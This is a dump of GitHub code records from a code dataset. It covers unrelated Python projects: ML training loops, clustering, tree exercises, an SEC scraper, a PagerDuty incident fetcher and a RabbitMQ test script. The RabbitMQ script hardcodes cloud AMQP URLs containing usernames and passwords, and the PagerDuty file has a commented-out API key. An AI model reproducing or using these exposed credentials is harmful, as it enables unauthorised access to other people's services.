DataLoader(dataset=valid_dataset,batch_size=config['model']['batch_size'],collate_fn=pad_batch)\n\n model = Transformer_Model(config=config['model']).to(device)\n\n loss = torch.nn.CrossEntropyLoss()\n optim = torch.optim.AdamW(params=model.parameters(),lr=config['train']['lr'])\n metric = BinaryF1Score()\n precision = BinaryPrecision()\n recall = BinaryRecall()\n schedular = torch.optim.lr_scheduler.CosineAnnealingWarmRestarts(optimizer=optim,T_0=100) #torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer=optim,patience=1)\n\n # (x1,x2,labels,masks) = next(iter(valid_dataloader))\n # out = model(x1,x2,masks)\n # ipdb.set_trace()\n # print(f\"Starting Learning Rate : {schedular._last_lr}\")\n best_f1 = 0\n for epoch in range(config['train']['epochs']):\n avg_train_loss = 0\n for batch,(x1,x2,labels,masks) in tqdm(enumerate(train_dataloader),desc=f\"Traning Epoch {epoch+1}\",total=len(train_dataloader)):\n x1 = x1.to(device)\n x2 = x2.to(device)\n masks = masks.to(device)\n labels = labels.to(device)\n # ipdb.set_trace()\n y_pred = model(x1,x2,masks)\n train_loss = loss(y_pred,labels)\n optim.zero_grad()\n train_loss.backward()\n optim.step()\n avg_train_loss += train_loss.item()\n # y_pred[y_pred>0.5] = 1\n # y_pred[y_pred<=0.5] = 0\n if (batch+1)%300 == 0:\n print(f\"Batch No. {batch+1} the average train loss {avg_train_loss/(batch+1)}\")\n\n binary_id = torch.argmax(y_pred,dim=1).to('cpu')\n groud_truth = torch.argmax(labels,dim=1).to('cpu')\n # ipdb.set_trace()\n metric.update(binary_id,groud_truth)\n precision.update(binary_id,groud_truth)\n recall.update(binary_id,groud_truth)\n schedular.step(epoch*len(train_dataloader)+batch)\n\n\n train_f1 = metric.compute()\n train_recall = recall.compute()\n train_precision = precision.compute()\n train_loss = avg_train_loss/len(train_dataloader)\n\n print(f\"Avergae Train Loss {train_loss}\")\n print(f\"F1 train : {train_f1}\")\n print(f\"Precision train : {train_precision}\")\n print(f\"Recall train : {train_recall}\")\n\n metric.reset()\n precision.reset()\n recall.reset()\n\n with torch.no_grad():\n val_loss = 0\n for batch,(x1,x2,labels,masks) in tqdm(enumerate(valid_dataloader),desc=f\"Validation Epoch {epoch+1}\",total=len(valid_dataloader)):\n x1 = x1.to(device)\n x2 = x2.to(device)\n masks = masks.to(device)\n labels = labels.to(device)\n y_pred = model(x1,x2,masks)\n val_loss += loss(y_pred,labels).item()\n\n binary_id = torch.argmax(y_pred,dim=1).to('cpu')\n groud_truth = torch.argmax(labels,dim=1).to('cpu')\n metric.update(binary_id,groud_truth)\n precision.update(binary_id,groud_truth)\n recall.update(binary_id,groud_truth)\n\n valid_f1 = metric.compute()\n valid_recall = recall.compute()\n valid_precision = precision.compute()\n valid_loss = val_loss/len(valid_dataloader)\n \n print(f\"Avergae Validation Loss {val_loss/len(valid_dataloader)}\")\n print(f\"F1 Validation: {valid_f1}\")\n print(f\"Precision train : {valid_recall}\")\n print(f\"Recall train : {valid_loss}\")\n\n if best_f1 --min_samples= --cluster_selection_epsilons= --cluster_selection_methods=\n\n Keword arguments:\n savefile: path to save the metadata and diagnostics \n inpath: path to feather data containing a labeled matrix of subreddit similarities.\n outpath: path to output fit kmeans clusterings.\n min_cluster_sizes: one or more integers indicating the minumum cluster size\n min_samples: one ore more integers indicating the minimum number of samples used in the algorithm\n cluster_selection_epsilon: one or more similarity thresholds for transition from dbscan to hdbscan\n cluster_selection_method: \"eom\" or \"leaf\" eom gives larger clusters. \n \"\"\" \n obj = hdbscan_grid_sweep(inpath,\n outpath,\n map(int,min_cluster_sizes),\n map(int,min_samples),\n map(float,cluster_selection_epsilons),\n cluster_selection_methods)\n obj.run()\n obj.save(savefile)\n\ndef KNN_distances_plot(mat,outname,k=2):\n nbrs = NearestNeighbors(n_neighbors=k,algorithm='auto',metric='precomputed').fit(mat)\n distances, indices = nbrs.kneighbors(mat)\n d2 = distances[:,-1]\n df = pd.DataFrame({'dist':d2})\n df = df.sort_values(\"dist\",ascending=False)\n df['idx'] = np.arange(0,d2.shape[0]) + 1\n p = pn.qplot(x='idx',y='dist',data=df,geom='line') + pn.scales.scale_y_continuous(minor_breaks = np.arange(0,50)/50,\n breaks = np.arange(0,10)/10)\n p.save(outname,width=16,height=10)\n \ndef make_KNN_plots():\n similarities = \"/gscratch/comdata/output/reddit_similarity/subreddit_comment_terms_10k.feather\"\n subreddits, mat = read_similarity_mat(similarities)\n mat = sim_to_dist(mat)\n\n KNN_distances_plot(mat,k=2,outname='terms_knn_dist2.png')\n\n similarities = \"/gscratch/comdata/output/reddit_similarity/subreddit_comment_authors_10k.feather\"\n subreddits, mat = read_similarity_mat(similarities)\n mat = sim_to_dist(mat)\n KNN_distances_plot(mat,k=2,outname='authors_knn_dist2.png')\n\n similarities = \"/gscratch/comdata/output/reddit_similarity/subreddit_comment_authors-tf_10k.feather\"\n subreddits, mat = read_similarity_mat(similarities)\n mat = sim_to_dist(mat)\n KNN_distances_plot(mat,k=2,outname='authors-tf_knn_dist2.png')\n\nif __name__ == \"__main__\":\n fire.Fire(run_hdbscan_grid_sweep)\n \n","repo_name":"groceryheist/cdsc_reddit","sub_path":"clustering/hdbscan_clustering.py","file_name":"hdbscan_clustering.py","file_ext":"py","file_size_in_byte":6368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25698997669","text":"#没壳的\r\nclass BTNode():\r\n def __init__(self, data, left=None, right=None):\r\n self.data, self.left, self.right = data, left, right\r\n\r\n def longest_path(self):\r\n \"\"\" BTNode -> list of BTNode\"\"\"\r\n## 这是下面已经包含了的base case\r\n## if self.left == self.right == None:\r\n## return [self]\r\n\r\n if self.left:\r\n l = self.left.longest_path()\r\n else:\r\n l = [] #base case\r\n\r\n if self.right:\r\n r = self.right.longest_path()\r\n else:\r\n r = [] #base case\r\n\r\n if len(l) > len(r):\r\n l.append(self)#记得要添加上自己!\r\n return l\r\n else:\r\n r.append(self)\r\n return r\r\n\r\n def all_longest_paths(self):\r\n \"\"\" BTNode -> list of list of BTNode\r\n 如果有好几个相同长度的longest path,return a list of list of the paths\"\"\"\r\n\r\n if self.left:\r\n l = self.left.all_longest_paths()\r\n else:\r\n l = []\r\n\r\n if self.right:\r\n r = self.right.all_longest_paths()#此时已经是一个大list里面含有很多个longest path\r\n else:\r\n r = [] \r\n\r\n #只想当前一层的情况,现在l和r都是已经包含了所有longest paths的list了\r\n if l == []:\r\n longest = r \r\n elif r == []:\r\n longest = l\r\n elif len(l[0]) > len(r[0]):#既然都是longest path那长度应该都是一样的,比较第一个path的长度就好\r\n longest = l\r\n elif len(l[0]) < len(r[0]):\r\n longest = r\r\n else:#l和r里的longest path长度相等\r\n longest = l + r\r\n\r\n if longest == []:\r\n return [[self]]#左支右支都没有path,tree里只有他一个\r\n \r\n for a_path in longest:#大list里的每一个小path\r\n a_path.append(self)#最后都要加回他自己\r\n\r\n return longest\r\n\r\n\r\n def shortest_path(self):#pretty much the same as the longest one\r\n pass\r\n\r\n\r\n def all_data_in_level(self, level):\r\n \"\"\" (BTNode, int) -> list of BTNode\r\n \"\"\"\r\n if level == 0:\r\n return [self]\r\n\r\n if self.left:\r\n l = self.left.all_data_in_level(level-1)#除去了root就低了一级level\r\n else:\r\n l = []\r\n\r\n if self.right:\r\n r = self.right.all_data_in_level(level-1)\r\n else:\r\n r = []\r\n\r\n return l + r\r\n\r\nt = BTNode(1,BTNode(2,BTNode(4,BTNode(8),BTNode(9)),BTNode(5,None,BTNode(10))),BTNode(3,BTNode(6),BTNode(7)))","repo_name":"xxcocoymlxx/Study-Notes","sub_path":"CSC148/06 Tree(BST)/more tree practice.py","file_name":"more tree practice.py","file_ext":"py","file_size_in_byte":2617,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"4465337523","text":"import pika\nimport json\n#host='amqps://hcdfnopi:QrnJs_rKX_kGxmgMFHoSevUTgrsqIPuh@roedeer.rmq.cloudamqp.com/hcdfnopi'\nhost='amqps://ppapnglh:anS8VpRjtAenIzJqaRN6MYLTBoiH16zm@whale.rmq.cloudamqp.com/ppapnglh'\n\n# url = os.environ.get('CLOUDAMQP_URL', 'amqp://guest:guest@localhost:5672/%2f')amqps://hcdfnopi:QrnJs_rKX_kGxmgMFHoSevUTgrsqIPuh@roedeer.rmq.cloudamqp.com/hcdfnopi\n\n# params = pika.URLParameters(url)\nconnection = pika.BlockingConnection(\n\npika.URLParameters(host)\n)\nchannel = connection.channel()\nchannel.queue_declare(queue='test1')\ndict1={\"ID\": 338719585, \"Account\": \"DUC00074\", \"Symbol\": \"EAGG\", \"SecurityType\": \"STK\", \"Position\": 1280.0, \"Amount\": 53.3022901, \"Currency\": \"USD\"}\nchannel.basic_publish(exchange='',\n routing_key='hello',\n body=json.dumps(dict1))\nprint(\" [x] Sent 'Hello World!'\")\nconnection.close()\n#pika.ConnectionParameters(host)\n# pika.URLParameter(host)\n","repo_name":"chiefexb/tws_script","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14923091816","text":"from __future__ import print_function\nfrom builtins import zip\nfrom builtins import range\nfrom builtins import object\n# Copyright 2018 The TensorFlow Authors All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\nimport numpy as np\nimport tensorflow as tf\nimport time, os, traceback, multiprocessing, portalocker\n\nimport envwrap\nimport valuerl\nimport util\nfrom config import config\n\n\ndef run_env(pipe):\n env = envwrap.get_env(config[\"env\"][\"name\"])\n reset = True\n while True:\n if reset is True: pipe.send(env.reset())\n action = pipe.recv()\n obs, reward, done, reset = env.step(action)\n pipe.send((obs, reward, done, reset))\n\nclass AgentManager(object):\n \"\"\"\n Interact with the environment according to the learned policy,\n \"\"\"\n def __init__(self, proc_num, evaluation, policy_lock, batch_size, config):\n self.evaluation = evaluation\n self.policy_lock = policy_lock\n self.batch_size = batch_size\n self.config = config\n\n self.log_path = util.create_directory(\"%s/%s/%s/%s\" % (config[\"output_root\"], config[\"env\"][\"name\"], config[\"name\"], config[\"log_path\"])) + \"/%s\" % config[\"name\"]\n self.load_path = util.create_directory(\"%s/%s/%s/%s\" % (config[\"output_root\"], config[\"env\"][\"name\"], config[\"name\"], config[\"save_model_path\"]))\n\n ## placeholders for intermediate states (basis for rollout)\n self.obs_loader = tf.placeholder(tf.float32, [self.batch_size, np.prod(self.config[\"env\"][\"obs_dims\"])])\n\n ## build model\n self.valuerl = valuerl.ValueRL(self.config[\"name\"], self.config[\"env\"], self.config[\"policy_config\"])\n self.policy_actions = self.valuerl.build_evalution_graph(self.obs_loader, mode=\"exploit\" if self.evaluation else \"explore\")\n\n # interactors\n self.agent_pipes, self.agent_child_pipes = list(zip(*[multiprocessing.Pipe() for _ in range(self.batch_size)]))\n self.agents = [multiprocessing.Process(target=run_env, args=(self.agent_child_pipes[i],)) for i in range(self.batch_size)]\n for agent in self.agents: agent.start()\n self.obs = [pipe.recv() for pipe in self.agent_pipes]\n self.total_rewards = [0. for _ in self.agent_pipes]\n self.loaded_policy = False\n\n self.sess = tf.Session()\n self.sess.run(tf.global_variables_initializer())\n\n self.rollout_i = 0\n self.proc_num = proc_num\n self.epoch = -1\n self.frame_total = 0\n self.hours = 0.\n\n self.first = True\n\n def get_action(self, obs):\n if self.loaded_policy:\n all_actions = self.sess.run(self.policy_actions, feed_dict={self.obs_loader: obs})\n all_actions = np.clip(all_actions, -1., 1.)\n return all_actions[:self.batch_size]\n else:\n return [self.get_random_action() for _ in range(obs.shape[0])]\n\n def get_random_action(self, *args, **kwargs):\n return np.random.random(self.config[\"env\"][\"action_dim\"]) * 2 - 1\n\n def step(self):\n actions = self.get_action(np.stack(self.obs))\n self.first = False\n [pipe.send(action) for pipe, action in zip(self.agent_pipes, actions)]\n next_obs, rewards, dones, resets = list(zip(*[pipe.recv() for pipe in self.agent_pipes]))\n\n frames = list(zip(self.obs, next_obs, actions, rewards, dones))\n\n self.obs = [o if resets[i] is False else self.agent_pipes[i].recv() for i, o in enumerate(next_obs)]\n\n for i, (t,r,reset) in enumerate(zip(self.total_rewards, rewards, resets)):\n if reset:\n self.total_rewards[i] = 0.\n if self.evaluation and self.loaded_policy:\n with portalocker.Lock(self.log_path+'.greedy.csv', mode=\"a\") as f: f.write(\"%2f,%d,%d,%2f\\n\" % (self.hours, self.epoch, self.frame_total, t+r))\n\n else:\n self.total_rewards[i] = t + r\n\n if self.evaluation and np.any(resets): self.reload()\n\n self.rollout_i += 1\n return frames\n\n def reload(self):\n if not os.path.exists(\"%s/%s.params.index\" % (self.load_path ,self.valuerl.saveid)): return False\n with self.policy_lock:\n self.valuerl.load(self.sess, self.load_path)\n self.epoch, self.frame_total, self.hours = self.sess.run([self.valuerl.epoch_n, self.valuerl.frame_n, self.valuerl.hours])\n self.loaded_policy = True\n self.first = True\n return True\n\ndef main(proc_num, evaluation, policy_replay_frame_queue, model_replay_frame_queue, policy_lock, config):\n try:\n np.random.seed((proc_num * int(time.time())) % (2 ** 32 - 1))\n agentmanager = AgentManager(proc_num, evaluation, policy_lock, config[\"evaluator_config\"][\"batch_size\"] if evaluation else config[\"agent_config\"][\"batch_size\"], config)\n frame_i = 0\n while True:\n new_frames = agentmanager.step()\n if not evaluation:\n policy_replay_frame_queue.put(new_frames)\n if model_replay_frame_queue is not None: model_replay_frame_queue.put(new_frames)\n if frame_i % config[\"agent_config\"][\"reload_every_n\"] == 0: agentmanager.reload()\n frame_i += len(new_frames)\n\n except Exception as e:\n print('Caught exception in agent process %d' % proc_num)\n traceback.print_exc()\n print()\n try:\n for i in agentmanager.agents: i.join()\n except:\n pass\n raise e\n","repo_name":"yitu-opensource/MobileNeXt","sub_path":"mobile_deployment/tensorflow/slim/models/research/steve/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":5652,"program_lang":"python","lang":"en","doc_type":"code","stars":146,"dataset":"github-code","pt":"77"} +{"seq_id":"71873076408","text":"import requests\nimport sentry_sdk\nfrom celery import Celery\nfrom bs4 import BeautifulSoup\nfrom dateutil.parser import parse\nfrom helpers.forms import FORMS\nfrom helpers.sec_utils import *\nfrom helpers.github_json import check_github_json\nload_dotenv()\n\napp = Celery('tasks')\napp.conf.timezone = 'UTC'\napp.conf.broker_pool_limit = 1\napp.conf.broker_url = os.getenv('CLOUDAMQP_URL')\napp.conf.beat_schedule = {\n 'scrape-every-10-seconds': {\n 'task': 'main.get_filing',\n 'schedule': 10.0\n },\n}\nsentry_sdk.init(os.getenv('SENTRY_DSN'))\n\n@app.task\ndef get_filing():\n\tSEC_URL = \"https://www.sec.gov/cgi-bin/browse-edgar?action=getcurrent&CIK=&type=&company=&dateb=&owner=include&start=0&count=40&output=atom\"\n\tTSLA_CIK = \"0001318605\"\n\t# DUMMY_CIK = \"0001048477\"\n\tuser_agent = \"RoboStox hellorobostox@gmail.com\"\n\theaders = {'User-agent': user_agent}\n\ttry:\n\t\tresponse = requests.get(SEC_URL, headers=headers)\n\t\tif response.status_code != 200:\n\t\t\traise Exception(f\"Status Code Error: {response.status_code}\")\n\t\tsoup = BeautifulSoup(response.content, \"xml\")\t\t\n\t\tfilings = soup.findAll('entry')\n\t\tfor f in filings:\n\t\t\ttitle = f.title.text\n\t\t\tform_type = f.category.get(\"term\")\n\t\t\tapi_date = f.updated.text\n\t\t\tpython_date = parse(api_date)\n\t\t\tpretty_time = python_date.strftime(\"%I:%M%p\")\n\t\t\tcik, filing_entity = circle_brackets_data(title)\t\t\n\t\t\tfiling = {\n\t\t\t\t\"company_name\": get_company_name(title),\t\t\t\t\t\n\t\t\t\t\"filing_link\": f.link.get(\"href\"),\n\t\t\t\t\"form_type\": form_type,\n\t\t\t\t\"pretty_time\": pretty_time,\n\t\t\t\t\"raw_datetime\": api_date,\n\t\t\t\t\"form_explanation\": generate_form_explanation(form_type),\n\t\t\t\t\"cik_code\": cik\n\t\t\t}\n\t\t\tif filing_entity != \"Reporting\":\n\t\t\t\tif cik == TSLA_CIK and form_type in FORMS.keys():\n\t\t\t\t\tcheck_github_json(filing)\n\t\t\t\telse:\t\t\t\t\t\t\n\t\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tcontinue\n\texcept Exception as e:\n\t\tsentry_sdk.capture_exception(e)\n\n# if __name__ == \"__main__\":\n# \tget_filing()","repo_name":"daneasterman/robostox-twitter-bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"4350641261","text":"import numpy as np\nfrom .enumerations import INNER, MID3D, OUTER\n\nMETA_HALO_VALID = 0\nMETA_N_OUTER = 1\nMETA_N_MID3D = 2\nMETA_N_INNER = 3\nMETA_SIZE = 4\n\n\ndef make_meta(halo_valid: bool, grid):\n meta = np.empty(META_SIZE, dtype=int)\n meta[META_HALO_VALID] = halo_valid\n meta[META_N_OUTER] = grid[OUTER] if len(grid) > 1 else 0\n meta[META_N_MID3D] = grid[MID3D] if len(grid) > 2 else 0\n meta[META_N_INNER] = grid[INNER]\n return meta\n","repo_name":"piotrbartman/PyMPDATA-old","sub_path":"PyMPDATA/arakawa_c/meta.py","file_name":"meta.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5375663119","text":"'''\nLet the three subjects be Maths, Physics and Computers\nwith Max marks equal to 100\n'''\nwhile True:\n try:\n maths=int(input(\"Enter the marks in Maths: \"))\n physics=int(input(\"Enter the marks in Physics: \"))\n computers=int(input(\"Enter the marks in Computers: \"))\n if(maths>100 or physics>100 or computers>100):\n raise ValueError\n elif(maths<0 or physics<0 or computers<0):\n raise ArithmeticError\n else:\n break\n except ValueError:\n print(\"Marks cannot be greater than 100!\")\n except ArithmeticError:\n print(\"Marks cannot be less than 0!\")\nprint(f\"The percentage scored is {(maths+physics+computers)/3}\")","repo_name":"chaitanya-bhargava/Sem-1-C-Programming-File","sub_path":"python3.py","file_name":"python3.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73805447928","text":"import sys\nimport os\nfrom os.path import join\nimport csv\n\nfrom collections import Counter, namedtuple\n\n# BlobSample = namedtuple(\"BlobSample\", \"sample ncontigs dom_org dom_org_ncontigs dom_org_perc dom_org_span subdom_org subdom_org_ncontigs subdom_org_perc subdom_org_span\".split(\" \"))\n\nBlobSampleFields = \"sample size ncontigs\" + \\\n \" Pgbp Pgbp_size Pgbp_size_pc Pgbp_ctg Pgbp_ctg_pc\" + \\\n \" Pgct Pgct_size Pgct_size_pc Pgct_ctg Pgct_ctg_pc\" + \\\n \" Sgbp Sgbp_size Sgbp_size_pc Sgbp_ctg Sgbp_ctg_pc\" + \\\n \" Sgct Sgct_size Sgct_size_pc Sgct_ctg Sgct_ctg_pc\"\n\nBlobSample = namedtuple(\"BlobSample\", BlobSampleFields.split(\" \"))\n\nHEADER = [\n \"Sample\", \"Assembly size [bp] (asmsize)\", \"#Contigs\",\n \"Predominant genus by size (Pgbp)\", \"Size (Pgbp) [bp]\", \"Size (Pgbp) / asmsize\", \"#Contigs (Pgbp)\", \"#Contigs (Pgbp) / #Contigs\",\n \"Predominant genus by contig (Pgct)\", \"Size (Pgct) [bp]\", \"Size (Pgct) / asmsize\", \"#Contigs (Pgct)\", \"#Contigs (Pgct) / #Contigs\",\n \"Subdominant genus by size (Sgbp)\", \"Size (Sgbp) [bp]\", \"Size (Sgbp) / asmsize\", \"#Contigs (Sgbp)\", \"#Contigs (Sgbp) / #Contigs\",\n \"Subdominant genus by contig (Sgct)\", \"Size (Sgct) [bp]\", \"Size (Sgct) / asmsize\", \"#Contigs (Sgct)\", \"#Contigs (Sgct) / #Contigs\",\n ]\n\ndef compileBlobReport(blob_dir, out=sys.stdout):\n print(\"Running BLOBREPORT... \" + blob_dir)\n print(*HEADER, sep=\"\\t\", file=out)\n for cdir, dirs, files in os.walk(blob_dir):\n blobtable = list(filter(lambda s:s.endswith(\".blobDB.table.txt\"), files))\n if blobtable:\n sample = blobtable[0].split(\".\")[0]\n taxcounter, spancounter, taxmap = Counter(), Counter(), dict()\n # # name length GC N bam0 family.t.6 family.s.7 family.c.8\n # 1 193272 0.5448 0 172.984 Lactobacillaceae 15529.0 0\n with open(join(cdir, blobtable[0])) as tin:\n for row in csv.reader(tin, delimiter=\"\\t\"):\n if not row[0].startswith(\"#\"):\n genus = row[5].split(\" \")[0]\n taxcounter[genus] += 1\n spancounter[genus] += int(row[1])\n taxmap.setdefault(genus, Counter())[row[5]] += 1\n \n ncontigs, totalsize = sum(taxcounter.values()), sum(spancounter.values())\n orgs_by_size = sorted(spancounter.items(), key=lambda x:x[1], reverse=True)\n orgs_by_nctg = sorted(taxcounter.items(), key=lambda x:x[1], reverse=True)\n pdomorg_by_size = orgs_by_size.pop(0)\n try:\n sdomorg_by_size = orgs_by_size.pop(0)\n except:\n sdomorg_by_size = (None, 0)\n pdomorg_by_nctg = orgs_by_nctg.pop(0)\n try:\n sdomorg_by_nctg = orgs_by_nctg.pop(0)\n except:\n sdomorg_by_nctg = (None, 0)\n blob_data = BlobSample(sample, \n totalsize,\n ncontigs,\n pdomorg_by_size[0], \n spancounter[pdomorg_by_size[0]],\n spancounter[pdomorg_by_size[0]] / totalsize if totalsize else None,\n taxcounter[pdomorg_by_size[0]], \n taxcounter[pdomorg_by_size[0]] / ncontigs if ncontigs else None,\n pdomorg_by_nctg[0],\n spancounter[pdomorg_by_nctg[0]],\n spancounter[pdomorg_by_nctg[0]] / totalsize if totalsize else None,\n taxcounter[pdomorg_by_nctg[0]], \n taxcounter[pdomorg_by_nctg[0]] / ncontigs if ncontigs else None,\n sdomorg_by_size[0] if sdomorg_by_size[0] is not None else \"NA\", \n spancounter[sdomorg_by_size[0]],\n spancounter[sdomorg_by_size[0]] / totalsize if totalsize else None,\n taxcounter[sdomorg_by_size[0]], \n taxcounter[sdomorg_by_size[0]] / ncontigs if ncontigs else None,\n sdomorg_by_nctg[0] if sdomorg_by_nctg[0] is not None else \"NA\",\n spancounter[sdomorg_by_nctg[0]],\n spancounter[sdomorg_by_nctg[0]] / totalsize if totalsize else None,\n taxcounter[sdomorg_by_nctg[0]], \n taxcounter[sdomorg_by_nctg[0]] / ncontigs if ncontigs else None)\n\n print(*blob_data, sep=\"\\t\", file=out)\n","repo_name":"EI-CoreBioinformatics/qaa","sub_path":"qaa/reporting/blobtools_report.py","file_name":"blobtools_report.py","file_ext":"py","file_size_in_byte":5158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25716307817","text":"import pandas as pd\nfrom tqdm import tqdm\nfrom gensim import corpora,similarities,models\nimport pandas as pd\nimport pickle\nfrom util import pre_process\nimport os\n\npath_temp = '../final_data/'\n\npapers = pd.read_csv('../data/candidate_paper.csv')\npapers=papers[papers['paper_id'].notnull()]\npapers['abstract'] = papers['abstract'].fillna('none')\npapers['title'] = papers['title'].fillna('none')\npapers['keywords'] = papers['keywords'].fillna('none')\n\n\ntrain=papers['title'].values+' '+papers['abstract'].values+' '+papers['keywords'].apply(lambda x: x.replace(';',' ')).values\ntrain_item_id=list(papers['paper_id'].values)\n\nwith open(path_temp+'paper_id.pkl', 'wb') as fw:\n pickle.dump(train_item_id,fw)\n\n\nif not os.path.exists(path_temp+'train_content.pkl'):\n with open(path_temp+'train_content.pkl','wb') as fw:\n train = list(map(lambda x: pre_process(x), tqdm(train)))\n pickle.dump(train,fw)\nelse:\n with open(path_temp+'train_content.pkl','rb') as fr:\n train = pickle.load(fr)\n\n\ndictionary = corpora.Dictionary(train)\ncorpus = [dictionary.doc2bow(text) for text in train]\n\n# corpus是一个返回bow向量的迭代器。下面代码将完成对corpus中出现的每一个特征的IDF值的统计工作\ntfidf_model = models.TfidfModel(corpus, dictionary=dictionary)\ncorpus_tfidf = tfidf_model[corpus]\n\ndictionary.save(path_temp+'train_dictionary.dict') # 保存生成的词典\ntfidf_model.save(path_temp+'train_tfidf.model')\ncorpora.MmCorpus.serialize(path_temp+'train_corpuse.mm', corpus)\nfeaturenum = len(dictionary.token2id.keys()) # 通过token2id得到特征数\n# 稀疏矩阵相似度,从而建立索引,我们用待检索的文档向量初始化一个相似度计算的对象\nindex = similarities.SparseMatrixSimilarity(corpus_tfidf, num_features=featurenum) #这是文档的index\nindex.save(path_temp+'train_index.index')\n","repo_name":"myeclipse/wsdm_cup_2020_solution","sub_path":"preprocess/step2:prepare_recall.py","file_name":"step2:prepare_recall.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","stars":87,"dataset":"github-code","pt":"77"} +{"seq_id":"14212867145","text":"from time import time, gmtime, strftime\n\nfrom pdpyras import APISession\n\n\ndef incident_iter_selected(api_key, duration, service_ids, integrations, all_tags):\n api_session = APISession(api_key)\n durations = {\"0\": 30, \"1\": 60, \"2\": 90, \"3\": 120, \"4\": 150, \"5\": 180, \"6\": 210, \"7\": 240, \"8\": 270, \"9\": 300,\n \"10\": 330, \"11\": 360, \"12\": 440, \"13\": 720, \"14\": 900, \"15\": 1080}\n incidents = get_incidents(durations[duration], api_session, service_ids, integrations, all_tags)\n print(\"Found %s for Service %s for %s months with integration: %s\" % (\\\n str(len(incidents)), service_ids[0], str(int(duration) + 1), integrations))\n\n return incidents\n\n\ndef get_incidents(duration, api_session, service_ids, integrations, all_tags):\n incidents = []\n for i in range(30, duration + 30, 30):\n disco_param = discovery_params(i, service_ids)\n temp_incidents = iter_incidents(api_session, disco_param, integrations, all_tags)\n incidents = incidents + temp_incidents\n\n return incidents\n\n\ndef discovery_params(i, services):\n current_window = i + 5 if i == 360 else i\n time_today = int(time()) - ((i - 30) * 24 * 60 * 60)\n time_to = int(time()) - (current_window * 24 * 60 * 60)\n\n discover_from = strftime('%Y-%m-%dT%H:%M:%S-00', gmtime(time_today))\n discover_to = strftime('%Y-%m-%dT%H:%M:%S-00', gmtime(time_to))\n\n window_param = {'since': discover_to, 'until': discover_from, 'service_ids[]': [services], 'time_zone': 'UTC',\n 'include[]': ['first_trigger_log_entries']}\n return window_param\n\n\ndef iter_incidents(api_session, window_param, integrations, all_tags):\n all_incidents = []\n ignored = []\n\n count = 0\n\n # Making PagerDuty API calls for Incidents in this section\n for current_incident in api_session.iter_all('incidents', params=window_param, paginate=True):\n temp_incident = current_incident\n alerts = api_session.rget('incidents/%s/alerts' % current_incident['id'])\n try:\n temp_incident[\"all_alerts\"] = alerts[\"alerts\"]\n except TypeError:\n temp_incident[\"all_alerts\"] = alerts\n if \"[REDACTED] by\" in current_incident['description']:\n continue\n\n ftle_channel = current_incident[\"first_trigger_log_entry\"][\"channel\"]\n # print('--------\\n',integrations)\n # print(ftle_channel['details'], '\\n')\n if integrations.lower() == 'datadog' and 'tags' in ftle_channel['details']:\n tags = current_incident[\"first_trigger_log_entry\"][\"channel\"][\"details\"][\"tags\"]\n elif integrations.lower() == 'dynatrace' and 'Tags' in ftle_channel['details']:\n tags = current_incident[\"first_trigger_log_entry\"][\"channel\"][\"details\"][\"Tags\"]\n elif integrations.lower() == 'nagios' and 'host' in ftle_channel:\n tags = 'hostname:' + current_incident[\"first_trigger_log_entry\"][\"channel\"][\"host\"]\n elif integrations.lower() == 'checkmk' and 'host' in ftle_channel:\n tags = current_incident[\"first_trigger_log_entry\"][\"channel\"][\"host\"]\n else:\n tags = \"\"\n if tags:\n extract_tags(tags, all_tags)\n\n temp_incident[\"tags\"] = tags\n temp_incident[\"integration\"] = integrations\n all_incidents.append(temp_incident)\n return all_incidents\n\n\ndef extract_tags(current_tags, all_tags):\n first_layer_tags = current_tags.split(\",\")\n\n if \"untagged\" not in all_tags:\n all_tags[\"untagged\"] = []\n\n for tag in first_layer_tags:\n tag_extract = tag.strip().replace(\" \", \"_\").split(\":\")\n\n if len(tag_extract) == 1 and tag_extract[0] not in all_tags[\"untagged\"]:\n all_tags[\"untagged\"].append(tag_extract[0])\n elif len(tag_extract) == 2:\n if tag_extract[0] not in all_tags:\n all_tags[tag_extract[0]] = [tag_extract[1]]\n elif tag_extract[1] not in all_tags[tag_extract[0]]:\n all_tags[tag_extract[0]].append(tag_extract[1])\n elif len(tag_extract) == 3:\n if tag_extract[0] not in all_tags:\n all_tags[tag_extract[0]] = [tag_extract[1] + tag_extract[2]]\n elif tag_extract[1] + tag_extract[2] not in all_tags[tag_extract[0]]:\n all_tags[tag_extract[0]].append(tag_extract[1] + tag_extract[2])\n\n\n\n# api_key = \"ozhUyFftDxYFTR2rsVWQ\"\n# service_ids = ['PG8L64X', 'PYZQ56E']\n# integrations = ['Datadog', 'Dynatrace']\n# durations = ['5', '9', '10']\n# print(\"---GETTING INCIDENTS---\")\n# incidents = []\n# tags = {}\n# for i in range(len(service_ids)):\n# print(\"---Getting incidents for %s in %s month(s)---\" % (service_ids[i], str(int(durations[i]) + 1)))\n# incidents += incident_iter_selected(api_key, durations[i], service_ids[i], integrations[i], tags)\n#\n# print(\"---GOT INCIDENTS---\")\n#\n# count = 1\n# for incident in incidents:\n# print(count, 